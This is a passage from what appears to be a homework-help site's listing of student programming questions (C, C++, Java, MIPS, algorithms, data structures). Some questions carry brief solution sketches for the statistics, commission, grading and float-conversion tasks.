x=absolute(x); // converting the negative value to positive by calling absolute function
x=rad_degrees(x); // converting the value in radians into degrees by calling rad_degrees
T1=x;
sign=-1;
Den=3;
power=x*x*x;
while(y<4) // executing the while loop for three times
{
T2=T1+sign * (power/Den); // T1 = x, power = x^3, and Den = 3
power=power*x*x; // next time it will be x^5 and x^7
sign=(-1) * sign; // alternate + and -
Den = Den + 2; // increase the denominator
T1=absolute(T2); // assigning the T2 to T1
y= y+1;
}
return T1;
}
Use the three functions from assignment 4, but turn each of them into a void function that passes its values by reference. Add two more void functions: one for input of the parameters and one for output of the answers. Add another variable called delta which contains the convergence factor. Also print out the number of iterations it took to compute each answer.
The data will be
Tangent Delta
0.17633 .0001
0.36937 .00001
0.57735 .0000001
(0 answers)
- DashingTriangle9176 asked:
Problem requirements:
you are required to use and implement following functions in this problem:
/*return the sum of the given data set */
double sumData (double x [ ], int n);
/*return the median of the given data set */
double medianData (double x [ ], int n);
/*return the standard deviation of the given data set */
double stdData (double x [ ], int n);
/*return the range of the given data set*/
double rangeData (double x [ ], int n);
/* Display the frequency distribution in the given rages */
void freqData (double x [ ], int n);
you may define additional functions if needed.
The original data set stored in the array should never be changed as you perform different analyses.
In this problem you will implement a menu system managing an array of data. Your program will ask the user to enter some data (double type) from standard input and store it in an array. Once the array is entered, the following interface will be displayed, and the user will be asked to choose an option; the chosen operation is performed repeatedly until the last option, quit, is selected.
Please select the following operations:
1. Display the data set
2. calculate the Mean and Sum of the data set
3. calculate the Median of the data set
4. Calculate the standard deviation of the data set
5. find range of the data set
6. display a frequency distribution
7. Quit
If the user selects 1, the data set will be displayed on the screen.
If the user selects 2 or 3, the mean and sum, or the median, will be calculated and displayed on the screen. If there is an odd number of data values, the median is the middle value: half of all data are smaller than the median and half are larger. If there is an even number of data values, the median is the average of the two middle values.
If the user selects 4, the standard deviation of the given data set (x1, x2, ..., xn) is calculated by the formula:
standard deviation = sqrt[ (Σ_{i=1..n} xi^2)/n - ((Σ_{i=1..n} xi)/n)^2 ]
If the user selects 5, the range of the data set is calculated as follows:
range = maximum value - minimum value
If the user selects 6, a frequency distribution printout will be displayed that gives the number of values in the following ranges: (-∞,0), [0,10), [10,100), [100,+∞). Use a proper format (such as two columns) to display each range and the corresponding frequency count.
If the user selects 7, the program terminates.
If the user selects an option other than 1 to 7, an error message should be displayed and the program continues. (1 answer)
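The standard-deviation formula above (mean of the squares minus the square of the mean, under a square root) translates directly into code. These are sketches of three of the required functions; the median and frequency-table functions follow the same pattern.

```cpp
#include <cassert>
#include <cmath>

double sumData(double x[], int n) {
    double s = 0;
    for (int i = 0; i < n; ++i) s += x[i];
    return s;
}

// sqrt( (sum of xi^2)/n - ((sum of xi)/n)^2 ), as given in the assignment.
double stdData(double x[], int n) {
    double sum = 0, sumSq = 0;
    for (int i = 0; i < n; ++i) {
        sum += x[i];
        sumSq += x[i] * x[i];
    }
    double mean = sum / n;
    return std::sqrt(sumSq / n - mean * mean);
}

// range = maximum value - minimum value
double rangeData(double x[], int n) {
    double mn = x[0], mx = x[0];
    for (int i = 1; i < n; ++i) {
        if (x[i] < mn) mn = x[i];
        if (x[i] > mx) mx = x[i];
    }
    return mx - mn;
}
```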
- SourCouch5342 asked: PLEASE, NO HALFWAY SOLVED or UNCOMPLETED ANSWERS.
The sales commission for each salesperson at Cars-Corp. is the
following percentage of his/her total sales:
Total Sales (in US$) Commission
___________________________________________________
sale <= 25000 6%
25000 < sale <= 50000 8%
50000 < sale <= 80000 10%
80000 < sale 12%
Define the file-pointers *Infile_1 and *Outfile_1 and link them to
a given input file salein.dat (which is in the homework/directory;
use cp command to copy this file into your directory)
and the output file commout.dat (which you will create in this
assignment). Use while(fgets()!=NULL) to read all the lines in
salein.dat. For odd number lines (containing full names) sscanf
name and surname, print the full name on the screen and in
the output file commout.dat. For even number lines (with amount of
sale), sscanf sale and calculate the corresponding
commission by using the above table; then print the sale and the
commission on the screen and in the output file commout.dat, as shown
below. Close the opened files.
...................................................................
Your output on the screen and in the commout.dat should look like:
Johnathan Smith
The commission of Mr/Ms Smith is 12026.00, based on the sale of 85900.00
.........................................................................
.........................................................................
.........................................................................
Donna Summer
The commission of Mr/Ms Summer is 1500.00, based on the sale of 25000.00
*A given input file salein.dat*
John Everhart
75900
Paul Evans
95700
Juan Hernandez
45100
Rwanda Jackson
88500
Steve Jhonson
35800
Henry Chen
105000
Tracy Ravad
56000
Scott Peters
98000
Alex Ma
89800
Alma Roberts
34500
Nelson Shah
33800
Steven King
68000
Anne Rice
130000
(2 answers)
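Reading the table as a flat percentage applied to the whole sale (which matches the Donna Summer line above: 6% of 25000.00 is 1500.00), the calculation is one comparison chain. The function name is illustrative; the file I/O with fgets/sscanf wraps around this.

```cpp
#include <cassert>
#include <cmath>

// Commission as a flat percentage of the total sale, per the table.
double commission(double sale) {
    double rate;
    if (sale <= 25000)      rate = 0.06;
    else if (sale <= 50000) rate = 0.08;
    else if (sale <= 80000) rate = 0.10;
    else                    rate = 0.12;
    return sale * rate;
}
```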
- Anonymous asked: Model the following challenge:
Gabriella and Natalia decided to put their culinary skills to commercial use. Both were energetic and imaginative, in addition to being talented at food preparation. Moreover, they were both personable and well liked among their friends and neighbors.
Simply Delicious has several customers who request catering services on a regular basis. This business has also irregular customers and those trying the service for the first time. Gabriella and Natalia develop estimates for each job as follows: the type of food, its preparation, and the service are first determined. The job is then priced on a per-serving basis, and this amount is multiplied by the maximum number of expected guests. This information is recorded on a job estimate sheet and then entered into a computer.
Twenty percent of the revenues from each job are earmarked for employee compensation. If more than one employee works a job, the 20 percent is divided among them. Employees are paid every two weeks. Gabriella and Natalia are responsible for purchasing the food supplies. Gabriella keeps track of who works on each job and determines the amounts to be paid to each employee. Natalia takes responsibility for paying all other bills.
All purchases are made on account with various vendors in the area. Gabriella usually pays bills within 30 days of billing unless there is a discount available for early payment.
Employees are assigned to each job according to skills and availability. On occasion, additional part-time help is required, but drafting members from the families usually satisfies those needs. Gabriella usually makes job assignments at least one week in advance. When the job is completed, the supervisor (who could be Gabriella, Natalia or an employee) completes a job sheet listing the food used, who worked on the job, and their hours.
(1 answer)
- WiseLeg3638 asked: Modify the program so that it reports how many positive numbers were entered, and how many negative numbers were entered. It should run like this:
Please enter some numbers (0 to terminate)
3
27
-16
4
6
-1
0
4 positive numbers were entered
2 negative numbers were entered (1 answer)
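The counting loop can be sketched against any input stream, which makes the sample session above directly checkable; reading from std::cin instead reproduces the interactive behavior.

```cpp
#include <cassert>
#include <istream>
#include <sstream>

// Read integers until 0, counting how many were positive and negative.
void countSigns(std::istream& in, int& positives, int& negatives) {
    positives = negatives = 0;
    int n;
    while (in >> n && n != 0) {
        if (n > 0) ++positives;
        else       ++negatives;
    }
}
```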
- Anonymous asked: Replace each phrase containing "Until" with an equivalent phrase containing "While", and vice versa. For instance, the phrase (Until sum = 100) would be replaced by (While sum <> 100).
While (ans = "Y") And (n < 7) (0 answers)
- WiseLeg3638 asked: Modify the program so it reads numbers from the user until a zero is entered. When finished, the program reports the number of numbers entered. It should run like this:
Please enter some numbers (0 to terminate)
3
27
-16
4
6
-1
0
6 non-zero numbers were entered (1 answer)
- Anonymous asked (1 answer)
- Anonymous asked (1 answer)
- ngansoplili asked: Suppose you are a project manager in a consulting company that is building a Web-based e-commerce si… (1 answer)
- Anonymous asked:
********
***##***
**####**
*######*
*######*
**####**
***##***
********
input number :4
**************
******##******
*****####*****
****######****
***########***
**##########**
*############*
*############*
**##########**
***########***
****######****
*****####*****
******##******
**************
input number: 7 (2 answers)
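Working backwards from the two sample figures: for input n the pattern is 2n rows of width 2n, and row i (counting from 0 at the top of the upper half) has 2i hashes centered between n - i stars on each side, with the lower half mirroring the upper. A sketch under that reading:

```cpp
#include <cassert>
#include <string>
#include <vector>

// Build the 2n-by-2n star/hash diamond inferred from the sample outputs.
std::vector<std::string> diamond(int n) {
    std::vector<std::string> rows;
    for (int i = 0; i < n; ++i)         // upper half: 0, 2, 4, ... hashes
        rows.push_back(std::string(n - i, '*') +
                       std::string(2 * i, '#') +
                       std::string(n - i, '*'));
    for (int i = n - 1; i >= 0; --i) {  // lower half mirrors the upper
        std::string mirrored = rows[i]; // copy before push_back reallocates
        rows.push_back(mirrored);
    }
    return rows;
}
```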
- Anonymous asked: a) A user requests a Web page that consists of some text and three images. For this page, the client… (3 answers)
- Anonymous asked: Write a graphical Java program that allows clients to book seats on a small airplane. Use JButton objects to represent the seats. Display the buttons as a grid of five rows with 3 buttons per row. Assume that initially all seats are available and are labeled Seat 1 through Seat 15.
Create three panels in the application window. Use the top panel to provide instructions to the user, the center panel to display the buttons, and the bottom panel to display an Exit button that will close the window and terminate the program. Use layout managers to arrange the panels and the seat buttons.
When a button of an unassigned seat is clicked, a confirmation dialog box must be displayed. This dialog box must have yes, no, and cancel buttons. If the user clicks the yes button, then the seat button label changes to "Occupied". If the no or cancel buttons are clicked the dialog box closes and no additional action is taken.
When the user clicks a button with an “Occupied” label a message box should be displayed indicating that the seat is already reserved. This dialog box should have an OK button only.
When the last seat has been assigned, a dialog box informing the user that no empty seats remain must be displayed. This dialog box should have an OK button only.
The frame title bar must display a heading that represents the name of your application (for example, Acme Airline Reservation System). (1 answer)
- Anonymous asked: A) Use adders to implement a 2-bit multiplier: Z = X*Y, where X and Y are 2-bit numbers and Z is a 4-bit number. Draw the circuit and explain.
B) Use VHDL data flow and structural styles to implement the above circuit. (1 answer)
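For part A, the adder-based circuit forms two partial products, y·x0 and y·x1 shifted left one place, and sums them. A behavioral sketch of that structure (in C++ rather than VHDL, purely to illustrate the arithmetic):

```cpp
#include <cassert>

// Adder view of Z = X * Y for 2-bit X, Y: sum of shifted partial products.
unsigned mul2(unsigned x, unsigned y) {
    unsigned p0 = (x & 1u) ? y : 0u;         // partial product y * x0
    unsigned p1 = (x & 2u) ? (y << 1) : 0u;  // partial product y * x1, shifted
    return (p0 + p1) & 0xFu;                 // 4-bit result Z
}
```

The largest product, 3 x 3 = 9, fits in 4 bits, which is why Z needs exactly 4 bits.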
- Anonymous asked: Hi,
I'm having trouble writing a program in MIPS that is supposed to take in 4 integer inputs from the user and make the first two the multiplier and the last two the multiplicand. I am then supposed to multiply (the multiplier and multiplicand) and output the result in hex.
First of all, how do I combine the first two integers to make the multiplier and the last two the multiplicand? Secondly how would I go about multiplying them together? And lastly how would I print the result in hex?
Code is preferred but any help is appreciated!
(0 answers)
- SwiftToast4988 asked: Write a program that dynamically allocates an array large enough to hold a user-defined number of te… (1 answer)
- Anonymous asked: I need help with this project. It is creating a triangle. I am sending the instructions and part of the code that the instructor wants us to use.
Project: The Triangle Class
If a, b, and c are the lengths of the three sides of a triangle, its area can be calculated as
area = sqrt( s(s - a)(s - b)(s - c) )
(the whole expression sits under a radical), where 2s = a + b + c
ITP 120 - Introduction to Java Programming I
Problem Description:
Design a class named Triangle that extends GeometricObject (code given below).
The toString() method is implemented as follows:
return "Triangle: side1 = " + side1 + " side2 = " + side2 +
" side3 = " + side3 + " color = " + getColor() + " filled = " + isFilled();
Draw the UML diagram that involves the classes Triangle and GeometricObject. Implement the class. Use the test program (code given below) that creates a Triangle object with sides 1, 1.5, 1, color yellow and filled true, and displays the area, perimeter, color, and whether filled or not.
Analysis:
(Describe the purpose, processing, input and output in your own words.)
Design:
Draw the UML class diagram here
Testing:
Comment out the toString method in the Triangle class and run the program. What is the difference in the output? Explain the difference.
public class DemoTriangle {
public static void main(String[] args) {
Triangle triangle = new Triangle(1, 1.5, 1);
System.out.println(triangle);
triangle.setColor("yellow");
triangle.setFilled(true);
System.out.println("The area is " + triangle.getArea());
System.out.println("The perimeter is " + triangle.getPerimeter());
System.out.println(triangle);
}
}
public class GeometricObject {
private String color = "white";
private boolean filled;
private java.util.Date dateCreated;
/** Construct a default geometric object */
public GeometricObject() {
dateCreated = new java.util.Date();
}
/** Construct a geometric object with the specified color
* and filled value */
public GeometricObject(String color, boolean filled) {
dateCreated = new java.util.Date();
this.color = color;
this.filled = filled;
}
/** Return color */
public String getColor() {
return color;
}
/** Set a new color */
public void setColor(String color) {
this.color = color;
}
/** Return filled. Since filled is boolean,
its get method is named isFilled */
public boolean isFilled() {
return filled;
}
}
public class Triangle extends GeometricObject {
// Implement it
}
Submit the following items:
- Your jar file via Blackboard:
- Log in to Blackboard
- Click on Assignments on the left
- Click on the Week 1 Work folder
- Read the instructions there and turn in your jar file.
- This document with answers for analysis, design and testing.
(1 answer)
- Anonymous asked: Write a UML model (use-case diagram) for an online telephone directory to replace the phonebook that… (1 answer)
- Anonymous asked: Consider the design of an XML database system to store and query a collection of confidential XML documents so that only authorized users can read them. Each XML document is identified by a document id, subject, the content of the document, and a list of keywords to facilitate the search of messages. Messages are organized by categories and each category is identified by a unique category id, the name of the category, and a list of keywords to facilitate the search of categories. An XML document is posted to exactly one category. Each user of the system is identified by a user id, password, name, and email address. If a category is assigned to a user, then the user will be able to read all the XML documents under that category unless we explicitly prohibit the user from reading a particular document. A category can be assigned to multiple users and a user can have multiple category assignments.
Part 1: Design the database using the ER approach and then create the tables accordingly. Populate the tables so that each table contains at least 10 tuples. Then, using Java and SQL, implement the following functionality:
1. Insert a new user, make sure that each email can be registered at most once.
2. Delete an existing user;
3. Update an existing user by any attribute.
Some simple GUI interfaces are expected for each functionality. (0 answers)
- Anonymous asked (0 answers)
- cesareborgia1 asked: Give the hexadecimal memory representation for the real number 127.9375 that
is stored in a single precision 32 bit floating point variable. Show
your work for each of these steps.
i. Integer & Decimal/Fractional Portion Conversions
ii. Normalized Binary Representation for the Integer & Decimal
Portions Together
iii. Conversion from above to Sign, Exponent, Mantissa portions (1
bit, 8 bit, 23 bits respectively)
iv. Conversion from Binary to Hex
bonus question:
Examine the following code:
#include <stdio.h>
int main ( void ) {
float b = 33554433.0;
printf("%d\n", b);
}
What value is printed and why? Assume a 32 bit single precision float. (1 answer)
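Working the conversion by hand: 127.9375 = 1111111.1111 in binary = 1.1111111111 x 2^6, so the sign bit is 0, the biased exponent is 6 + 127 = 133 = 10000101 in binary, and the mantissa field is 1111111111 followed by thirteen zeros, giving 0x42FFE000. A small sketch can check such hand conversions by reinterpreting the float's bytes; note that memcpy avoids the undefined behavior the bonus question's printf("%d", b) runs into (the float is promoted to double through varargs, which %d then misreads).

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Return the raw IEEE-754 bit pattern of a 32-bit float.
uint32_t floatBits(float f) {
    uint32_t bits;
    std::memcpy(&bits, &f, sizeof bits);   // reinterpret the bytes safely
    return bits;
}
```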
- DashingCloud9082 asked: Write a program in Java that reads student scores, gets the best score, and then assigns grades based on
the following scheme:
Grade is A if score is >= best -10
Grade is B if score is >= best -20
Grade is C if score is >= best -30
Grade is D if score is >= best -40
Grade is F if score is >= best -50
The program prompts the user to enter the total number of students, then prompts the user to
enter all of the scores, and concludes by displaying the grades.
Here is a sample run:
Enter the number of students: 4
Enter 4 scores: 40 55 70 58
Student 0 scores is 40 and grade is C
Student 1 scores is 55 and grade is B
Student 2 scores is 70 and grade is A
Student 3 scores is 58 and grade is B (1 answer)
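The grading rule reduces to one comparison chain against the best score, reproduced here in C++ rather than Java since only the logic matters; the sample run above (best score 70) exercises all but the D and F branches.

```cpp
#include <cassert>

// Grade relative to the best score, per the scheme above.
char gradeFor(int score, int best) {
    if (score >= best - 10) return 'A';
    if (score >= best - 20) return 'B';
    if (score >= best - 30) return 'C';
    if (score >= best - 40) return 'D';
    return 'F';
}
```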
- PetitePencil421 asked:
// Name:
// Section:
import java.util.Scanner;

public class Lab9
{
public static void main(String[] args)
{
Scanner scan = new Scanner(System.in);
int numInts = 0;
int value = 0;
// Declare SIZE_ARR, a final int equal to 10.
// [Add Code Here]
// Declare an int array named iArr with its
// size equal to SIZE_ARR:
// [Add Code Here]
// Write a loop that will loop through until no more
// input is available.
// [Add Code Here]
// Use defensive programming to read in a number
// [Add Code Here]
// Verify that there is enough room to add
// the number read in into the array iArr.
// If not enough room display an error message
// and quit the program.
// [Add Code Here]
// Put the number read in into the array iArr
// [Add Code Here]
// Increment your num ints counter
// [Add Code Here]
// End of file loop
// [Add Code Here]
// Write a second loop that will print out the contents
// of the array as shown in the sample output.
// [Add Code Here]
} // end of main method
} // end of Lab9
It's supposed to read in the .in file. How do I do this? (1 answer)
- Anonymous asked: Barbara Smith is interviewing candidates to be her secretary, one at a time. After each interview she is able to determine the true competence level of the candidate (which can be thought of as some positive real number). However, she needs to make a spot decision whether or not to hire a candidate, before interviewing the remaining ones. If the candidates appear in random order, what is a good hiring strategy for Barbara? Suppose there are n candidates. Barbara decides to interview the first r candidates, noting down their scores but not hiring any of them. Let s be the largest score she records during this time. Then, she starts interviewing the remaining n - r candidates, and hires the first one who scores more than s (if none of them do, then she simply picks the last candidate).
(a) Show that the probability that Barbara ends up with the best secretary is at least r(n - r)/n^2
(b) What is a good setting for r, and what is the probability of success in this case? (0 answers)
- Anonymous asked: Chapter 12 Problem #13. Add option only and with input validation.
Please explain each step. My input validation is not working.
Thanks. (1 answer)
- Anonymous asked (0 answers)
- Anonymous asked: Function Assignment
Use of user defined functions and Nested-if logic.
You are the official score keeper for the “C” Bowling Association (CBA). You should write a program that will:
A. Input bowler’s name and three (3) scores (0-300 range).
B. Calculate average for that bowler.
C. Assign stars to that bowler based on the following scale:
avg >= 200 – 4 stars
avg 170 to 199 – 3 stars
avg 125 to 169 – 2 stars
avg 100 to 124 – 1 star
avg < 100 – no stars
D. Output the bowler's name, avg., and number of stars earned (the actual appropriate sequence of stars, not just a number).
* Your program must be able to process any number of bowlers.
(Use at least 10 sets of data).
E. Discover which bowler had the highest average.
F. Calculate the average of all the bowlers.
G. Output the answers to steps E & F appropriately labeled.
Steps B, C, D must be written as separate functions.
1 answer
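The nested-if star scale in step C reduces to a chain of range checks; a sketch of steps B and C (Python standing in for the C assignment; function names are illustrative):

```python
def stars_for(avg):
    """Step C: map a bowling average to its star string (scale from the post)."""
    if avg >= 200:
        return "****"
    elif avg >= 170:
        return "***"
    elif avg >= 125:
        return "**"
    elif avg >= 100:
        return "*"
    else:
        return ""

def bowler_summary(name, s1, s2, s3):
    """Steps A-C: average three scores (0-300) and assign stars."""
    avg = (s1 + s2 + s3) / 3
    return name, avg, stars_for(avg)
```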
- Anonymous asked: a. Design the logic for an application for a company that wants a report containing a breakdown of payroll by department. Input includes each employee's last name, first name, department number, hourly salary, and number of hours worked. The output is a list of the seven departments in the company (numbered 1 through 7) and the total gross payroll (rate times hours) for each department.
b. Modify “a” so that the report lists department names as well as numbers. The department names are:
Dept. Num. Department Name
1 Personnel
2 Marketing
3 Manufacturing
4 Computer Services
5 Sales
6 Accounting
7 Shipping
c. Modify the report created in exercise “b” so that it prints a line of information for each employee before printing the department summary at the end of the report. Each detail line must contain the employee’s name, department number, department name, hourly wage, hours worked, gross pay, and withholding tax.
Withholding taxes are based on the following percentages of gross pay:
Weekly Gross Pay ($) Withholding (%)
0.00 – 200.00 10
200.01 – 350.00 14
350.01 – 500.00 18
500.01 and up 22
0 answers
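The department lookup in part b and the withholding brackets in part c are both plain table-driven branching; a hedged sketch (the field order in the employee tuples is an assumption):

```python
DEPARTMENTS = {1: "Personnel", 2: "Marketing", 3: "Manufacturing",
               4: "Computer Services", 5: "Sales", 6: "Accounting",
               7: "Shipping"}

def withholding(gross):
    """Withholding tax from the bracket table in the post."""
    if gross <= 200.00:
        rate = 0.10
    elif gross <= 350.00:
        rate = 0.14
    elif gross <= 500.00:
        rate = 0.18
    else:
        rate = 0.22
    return round(gross * rate, 2)

def department_totals(employees):
    """employees: (last, first, dept, rate, hours) tuples.
    Returns total gross payroll per department."""
    totals = {d: 0.0 for d in DEPARTMENTS}
    for _, _, dept, rate, hours in employees:
        totals[dept] += rate * hours
    return totals
```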
- Juni3375 asked: The file Parameters.java contains a program to test the variable length method average from Section 7.5 of the text. Note
that average must be a static method since it is called from the static method main.
1. Compile and run the program. You must use the -source 1.5 option in your compile command.
2. Add a call to find the average of a single integer, say 13. Print the result of the call.
3. Add a call with an empty parameter list and print the result. Is the behavior what you expected?
4. Add an interactive part to the program. Ask the user to enter a sequence of at most 20 nonnegative integers. Your
program should have a loop that reads the integers into an array and stops when a negative is entered (the negative
number should not be stored). Invoke the average method to find the average of the integers in the array (send the
array as the parameter). Does this work?
5. Add a method minimum that takes a variable number of integer parameters and returns the minimum of the
parameters. Invoke your method on each of the parameter lists used for the average function.
//*******************************************************
// Parameters.java
//
// Illustrates the concept of a variable parameter list.
//*******************************************************
import java.util.Scanner;
public class Parameters
{
//-----------------------------------------------
// Calls the average and minimum methods with
// different numbers of parameters.
//-----------------------------------------------
public static void main(String[] args)
{
double mean1, mean2;
mean1 = average(42, 69, 37);
mean2 = average(35, 43, 93, 23, 40, 21, 75);
System.out.println ("mean1 = " + mean1);
System.out.println ("mean2 = " + mean2);
}
//----------------------------------------------
// Returns the average of its parameters.
//----------------------------------------------
public static double average (int ... list)
{
double result = 0.0;
if (list.length != 0)
{
int sum = 0;
for (int num: list)
sum += num;
result = (double)sum / list.length;
}
return result;
}
}
3 answers
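For step 5, the requested minimum takes a variable-length parameter list just like average; a language-neutral sketch (Python's *values playing the role of Java's int ... list; raising on an empty list is one design choice, Java code might instead return a sentinel):

```python
def minimum(*values):
    """Variable-length minimum, analogous to the Java varargs average."""
    if not values:
        raise ValueError("minimum of an empty argument list is undefined")
    low = values[0]
    for v in values[1:]:
        if v < low:
            low = v
    return low
```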
- baixiangguobing asked: The program should support two forms of input, for example,
America 55 China
USD 55 CHY
Just selecting 5 countries will be fine.
1 answer
- Anonymous asked: I need to implement two methods in my class UnorderedLinkedList: deleteFront and deleteBack.
My code is posted here:
Thank you!! :)
0 answers
- Anonymous asked: I need to add a method that will split a linked list into two sublists of (almost) equal size. I have some code but it's not working. Please fix it!
My full code is posted here:
Thank you!! :)
public void splitMid(LinkedListClass otherList)
{
otherList = new UnorderedLinkedList();
LinkedListNode current;
LinkedListNode current2;
if (count == 0)
System.out.println("The list is null.");
else
{
int newLength = count / 2;
current2 = first;
if (count % 2 == 0)
for(int i = 0; i<newLength; i++)
{
current2 = current2.link;
}
else
for(int i = 0; i<newLength+1; i++)
{
current2 = current2.link;
}
current = first;
if (count % 2 == 0)
while(current != current2)
{
this.deleteNode(first.info);
this.deleteNode(first.info);
this.insertLast(current.info);
current = current.link;
}
else
{
while(current != current2)
{
this.deleteNode(first.info);
this.insertLast(current.info);
current = current.link;
}
int nC = count / 2 - 1;
for(int i = 0; i <= nC; i++)
{
this.deleteNode(first.info);
}
}
while(current2 != null)
{
otherList.insertLast(current2.info);
current2 = current2.link;
}
}
}
0 answers
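The delete-and-reinsert approach above is fragile; the usual way to split at the midpoint is to walk to the last node of the first half, cut the link there, and hand the tail to the other list. A minimal sketch of that idea (Python, with a toy node class standing in for LinkedListNode; the first half keeps the extra node on odd counts, as in the posted code):

```python
class Node:
    def __init__(self, info, link=None):
        self.info, self.link = info, link

def split_mid(first, count):
    """Split a singly linked list into two halves; returns (head1, head2)."""
    if first is None:
        return None, None
    cut = (count + 1) // 2          # size of the first half
    node = first
    for _ in range(cut - 1):        # walk to the last node of the first half
        node = node.link
    second = node.link
    node.link = None                # detach the tail
    return first, second

def to_list(head):
    out = []
    while head:
        out.append(head.info)
        head = head.link
    return out
```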
- Anonymous asked: Show that the problem of testing whether two branching programs compute the same function is solvable in polynomial time if and only if P = NP.
1 answer
- Anonymous asked: I need to add a method that will split a linked list at a node whose info is given (#6 in the image, splitAt).
My code is posted here, please use it!
Thank you!! :)
1 answer
- Anonymous asked: The plane rotation through angle A from a = (x,y) to b =
(x',y') is defined by b = R*a, where R is defined below for
C = cos(A) and S = sin(A). Consider the approximations
b1 = R1*a, b2 = R2*a, and b3 = R3*a for
[C -S] [1 -A] [1 -S] [1 -S ]
R = [ ], R1 = [ ], R2 = [ ], R3 = [ ]
[S C] [A 1] [S 1] [S C*C]
a. Show that b3 can be computed with only two multiplications
and therefore (along with b1 and b2) has only half the cost
of computing b.
b. The relative errors in the rotated vectors, using the 2-norm
(Euclidean norm), are
||b-bi||
ei = ________ for i = 1,2,3.
||b||
Compute the relative errors as functions of A, and compare
the three approximations for accuracy. Hint: compare the
squared relative errors.
0 answers
- HungryBroccoli9028 asked (C++): 1. What is the effect of the following statement? If a statement is invalid, explain why it is invalid. The classes queueADT, queueType, and linkedQueueType are as defined in this chapter.
a) queueADT<int> newQueue;
b) queueType<double> sales(-10);
c) queueType<string> names;
d) linkedQueueType<int> numQueue(50);
2. What is the output of the following program segment?
linkedQueueType<int> queue;
queue.addQueue(10);
queue.addQueue(20);
cout << queue.front() << endl;
queue.deleteQueue();
queue.addQueue(2 * queue.back());
queue.addQueue(queue.front());
queue.addQueue(5);
queue.addQueue(queue.back() - 2);
linkedQueueType<int> tempQueue;
tempQueue = queue;
while (!tempQueue.isEmptyQueue())
{
cout << tempQueue.front() << " ";
tempQueue.deleteQueue();
}
cout << endl;
Please show steps.
1 answer
- Anonymous asked: The assignment can be found at
This is what I have so far. Any help with fixing this code would be much appreciated. Thanks.
import java.util.*;
import java.io.*;
class Person{
public String name;
public LinkedList<Person> friends;
public Person(String n){
name = n;
}
public String getName(){
return name;
}
public LinkedList<Person> getFriends(){
return friends;
}
}
public class MicroFB {
Hashtable<String, Person> People = new Hashtable<String, Person>();
Hashtable<String, Boolean> FriendCheck = new Hashtable<String, Boolean>();
public void detCommand(String c, String n1, String n2){
if (c =="P"){
newPerson(n1);
}
else if (c=="F"){
makeFriends(n1, n2);
}
else if (c=="U"){
unFriend(n1, n2);
}
else if (c=="L"){
getFriends(n1);
}
else if (c=="Q"){
areFriends(n1, n2);
}
//else if (c=="X"){
//System.exit();
//}
}
public void newPerson(String name){
Person P = new Person(name);
People.put(name, P);
}
public void makeFriends(String name1, String name2){
String comb;
Person p1 = People.get(name1);
Person p2 = People.get(name2);
p1.friends.add(p2);
p2.friends.add(p1);
if (name2.compareTo(name1)<0)
{
comb = name2+"*"+name1;
FriendCheck.put(comb, true);
}
else if (name1.compareTo(name2)>0)
{
comb = name1+"*"+name2;
FriendCheck.put(comb, true);
}
}
public void unFriend(String name1, String name2){
String comb;
Person p1 = People.get(name1);
Person p2 = People.get(name2);
p1.friends.remove(p2);
p2.friends.remove(p1);
if (name2.compareTo(name1)<0)
{
comb = name2+"*"+name1;
FriendCheck.remove(comb);
}
else if (name1.compareTo(name2)>0)
{
comb = name1+"*"+name2;
FriendCheck.remove(comb);
}
}
public void getFriends(String name1){
Person P = People.get(name1);
Iterator i = P.friends.iterator();
while (i.hasNext()) {
System.out.print(i.next() + ", ");
}
}
public boolean areFriends(String name1, String name2){
boolean areFds = false;
if (name2.compareTo(name1)<0)
{
String comb = name2+"*"+name1;
areFds = FriendCheck.get(comb);
}
else if (name1.compareTo(name2)>0)
{
String comb = name1+"*"+name2;
areFds = FriendCheck.get(comb);
}
return areFds;
}
public static void main(String[] args)
{
Scanner sc = new Scanner(System.in);
MicroFB MFB = new MicroFB();
String line;
String command;
String name1;
String name2 = "";
while (sc.hasNextLine()){
line = sc.nextLine();
String[] words = line.split(" ");
if (words.length == 3){
command = words[0];
name1 = words[1];
name2 = words[2];
MFB.detCommand(command, name1, name2);
}
else if (words.length == 2){
command = words[0];
name1 = words[1];
MFB.detCommand(command, name1, name2);
}
}
}
}
1 answer
- Anonymous asked: Write a C++ program program.cpp along with IntList.h and IntList.cpp.
Design a class IntList that contains a linked list of integers. The class should have member functions as follows:
– IntList(): Creates an empty list
– appendNode(int num): Adds a number to the end of the list
– deleteNode(int num): Delete a number from the list
– displayList(): Display the current contents of the list
– ~IntList(): Destroys the list
– selectionSort(): Performs selection sort on the list (in ascending order). Note that this sort operation must be performed directly on the linked list, not on some separate copy of the array. That is, you must use node pointers instead of array indexes to implement the algorithm.
In the main function do the following:
– Create an empty IntList object.
– Call appendNode function several times to put some numbers in random order.
– Then display the list (it should show unsorted numbers).
– Now perform selection sort on the list.
– Then display the list again (it should show sorted numbers).
2 answers
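One common way to meet the "node pointers, no array copy" requirement is to scan with two node references and swap the stored values; a sketch of that approach (Python stand-in for the C++ class; whether value-swapping or full node relinking is expected depends on the grader):

```python
class Node:
    def __init__(self, value, nxt=None):
        self.value, self.next = value, nxt

def selection_sort(head):
    """Selection sort directly on a singly linked list: for each position,
    find the smallest remaining value via a node-pointer scan and swap it in."""
    start = head
    while start:
        smallest = start
        scan = start.next
        while scan:
            if scan.value < smallest.value:
                smallest = scan
            scan = scan.next
        start.value, smallest.value = smallest.value, start.value
        start = start.next
    return head
```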
- Anonymous asked: I rate all answers given. Thanks in advance. (two questions)
Question #1
Let A = {A[1], A[2], …, A[n]} represent n integers. An algorithm Foo1 is given
Foo1 (A)
1. sum = 0;
2. for i=1 to n
3. if A[i] % 2 == 0
4. sum = sum + A[i];
5. return sum;
Briefly describe the functionality of this algorithm.
What could be the best case of the algorithm?
What is the best case running time of the algorithm?
What could be the worst case of the algorithm?
What is the worst case running time of the algorithm?
Question #2
A = {A[1], A[2], …, A[n]} represent n integers. An algorithm Foo2 is given
Foo2 (A)
1. temp = A[1];
2. for i = 2 to n
3. if A[i] < temp
4. temp = A[i];
5. return temp;
Briefly describe the functionality of this algorithm.
What could be the best case of the algorithm?
What is the best case running time of the algorithm?
What could be the worst case of the algorithm?
What is the worst case running time of the algorithm?
0 answers
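For intuition: Foo1 sums the even elements and Foo2 finds the minimum, and each touches every element exactly once, so best and worst case are both Θ(n); only the per-iteration work (whether the branch body runs) changes. Equivalent Python versions:

```python
def foo1(a):
    """Foo1: sum of the even elements of a."""
    return sum(x for x in a if x % 2 == 0)

def foo2(a):
    """Foo2: minimum element of a, tracked in a running 'temp'."""
    temp = a[0]
    for x in a[1:]:
        if x < temp:
            temp = x
    return temp
```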
